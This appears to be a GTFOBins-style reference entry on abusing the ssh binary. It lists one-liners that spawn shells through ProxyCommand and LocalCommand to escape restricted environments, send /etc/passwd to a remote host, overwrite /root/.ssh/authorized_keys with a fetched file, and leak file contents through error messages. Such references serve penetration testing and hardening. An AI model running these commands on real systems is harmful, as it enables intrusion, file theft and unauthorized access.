It can be used to break out from restricted environments by spawning an interactive system shell.
Spawn interactive shell on client. Does not require a successful connection.
ssh -o ProxyCommand=';sh 0<&2 1>&2' hostSpawn interactive shell on client. Requires a successful connection towards host.
ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh hostIt can be used to break out from the intended program by running non-interactive system commands.
Does not require a successful connection.
ssh -o ProxyCommand=';uname -a 1>&2' hostIt can exfiltrate files on the network.
Sends a local file (/etc/passwd) to a remote SSH server and saves it in a location (/tmp/out).
ssh host "cat /tmp/out" < /etc/passwdIt can download remote files.
Retrieves a remote file from an SSH server (/tmp/infile) and saves it to a local destination (/root/.ssh/authorized_keys).
ssh host "cat /tmp/infile" > /root/.ssh/authorized_keysIt reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
Reads a file and outputs it in an error message.
ssh -F /etc/passwd host